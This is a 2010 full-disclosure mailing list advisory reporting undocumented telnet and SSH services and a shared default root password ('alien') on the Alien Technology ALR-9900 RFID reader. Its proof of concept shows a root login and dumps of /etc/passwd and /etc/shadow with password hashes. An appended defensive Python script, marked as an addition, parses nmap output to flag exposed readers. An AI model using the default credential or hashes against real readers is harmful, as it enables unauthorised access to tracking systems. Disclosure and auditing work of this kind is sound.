Date: Tue, 04 May 2010 15:59:34 -0700
From: alien_technology@...h.com
To: full-disclosure@...ts.grok.org.uk
Subject: AlienTechnology ALR-9900 default root password and backdoor

Tested:
	www.alientechnology.com/readers/alr9900.php

Background:
	Alien Technology is a major RFID-reader designer and manufacturer.
Alien's products are sold to many corporations and the military.
Alien's readers can be interfaced with in several ways, including
serial, IO port and Ethernet port.  Alien has several daemons
running on their readers that are accessible through Ethernet and
completely undocumented.  We called Alien several times to ask them
about these undocumented services and were first deferred to
technical support and then had our numbers blocked.  We then
emailed them about the security ramifications of these daemons and
received no reply.

The Undocumented:
	port 2323 - telnetd
	port 23 - telnetd
	port 22 - sshd

The Flaws:
	default root password = 'alien'
	alien account has the same password across all readers
	port 2323 - provides a backdoor onto the readers for anyone who
knows the alien (or root) account password
	port 23  - same as above
	port 22  - same as above

The P.O.C:
Starting Nmap 5.21 ( http://nmap.org ) at 20XX-XX-XX XX:XX Pacific Daylight Time

Nmap scan report for XXX.XXX.XXX.XXX
Host is up (0.000092s latency).
Not shown: 995 closed ports

PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
111/tcp  open  rpcbind
2323/tcp open  unknown

MAC Address: XX:XX:XX:XX:XX:XX (Alien Technology)
Nmap done: 1 IP address (1 host up) scanned in 0.66 seconds


login as: root
Using keyboard-interactive authentication.
Password: <- root
Access denied
Using keyboard-interactive authentication.
Password: <- password
Access denied
Using keyboard-interactive authentication.
Password: <- alien

Last login: Sun Jan 11 03:04:54 1970 from XXX.XXX.XXX.XXX
root@...en-XXXXXX alien# id
uid=0(root) gid=0(root) groups=0(root)

root@...en-XXXXXX alien# cat /etc/passwd
root:$1$lKC6KEQ/$TY22pTtIBwjLxWd2EvM.d0:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
sshd:x:100:65534::/var/run/sshd:/bin/false
ntpd:x:102:102::/var/run/openntpd:/bin/false
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:1000:1000:The Alien,18220,,:/home/alien:/bin/bash

root@...en-XXXXXX alien# cat /etc/shadow
ntpd:!:13602:0:99999:7:::
sshd:!:13602:0:99999:7:::
alien:$1$kcyCMoEZ$kiwa.OVk5PuG4pBwbYEP//:13602:0:99999:7:::

Impact:
	Alien's readers are deployed in many secure facilities, typically
on closed networks.  Although these networks are closed, these
undocumented services could allow employees to modify reader
settings and subvert checkout systems.  These checkout systems are
often used to track valuable items, which makes such vulnerabilities
a serious matter.  If these readers are deployed on an open or large
network, they provide an easy way to tunnel into the network or to
attack it from an unexpected location.  Lastly, anyone who cracks
the alien account's password hash gets to use Alien's backdoor.
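As an added defender-side example (not part of the original post), the script below parses nmap "normal" output in the format quoted above and lists every host whose MAC vendor resolves to Alien Technology and which still exposes one of the undocumented services (22, 23, 2323), so a fleet of readers can be audited for exposure after a scan. The addresses and MACs in the sample scan text are constructed placeholders.

```python
import re

# Services the advisory reports as undocumented on the ALR-9900.
UNDOCUMENTED_PORTS = {22, 23, 2323}

# Constructed sample in the nmap "normal" output format quoted in the post
# (addresses and MACs are placeholders, not real readers).
SAMPLE_NMAP = """\
Nmap scan report for 10.0.0.5
Host is up (0.000092s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
2323/tcp open  unknown
MAC Address: 00:11:22:33:44:55 (Alien Technology)
Nmap scan report for 10.0.0.9
PORT     STATE SERVICE
80/tcp   open  http
MAC Address: 66:77:88:99:AA:BB (Alien Technology)
Nmap scan report for 10.0.0.20
PORT     STATE SERVICE
22/tcp   open  ssh
MAC Address: 66:77:88:99:AA:CC (Some Other Vendor)
Nmap done: 3 IP addresses (3 hosts up) scanned in 1.20 seconds
"""

def parse_nmap(text):
    """Split nmap normal output into {addr: {"vendor": str, "open": set of open TCP ports}}."""
    hosts, cur = {}, None
    for line in text.splitlines():
        if m := re.match(r"Nmap scan report for (\S+)", line):
            cur = hosts.setdefault(m.group(1), {"vendor": "", "open": set()})
        elif cur is None:
            continue  # ignore preamble lines before the first host report
        elif m := re.match(r"(\d+)/tcp\s+open\b", line):
            cur["open"].add(int(m.group(1)))
        elif m := re.match(r"MAC Address: \S+ \((.*)\)", line):
            cur["vendor"] = m.group(1)
    return hosts

def flag_alien_readers(text):
    """Return {addr: sorted exposed undocumented ports} for hosts nmap attributes to Alien Technology."""
    findings = {}
    for addr, h in parse_nmap(text).items():
        exposed = sorted(h["open"] & UNDOCUMENTED_PORTS)
        if "Alien Technology" in h["vendor"] and exposed:
            findings[addr] = exposed
    return findings
```

Feed it the output of a scan of the reader VLAN (e.g. `nmap -oN` of the subnet) and any address it returns still needs the telnet daemons disabled or firewalled and the default credentials changed.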

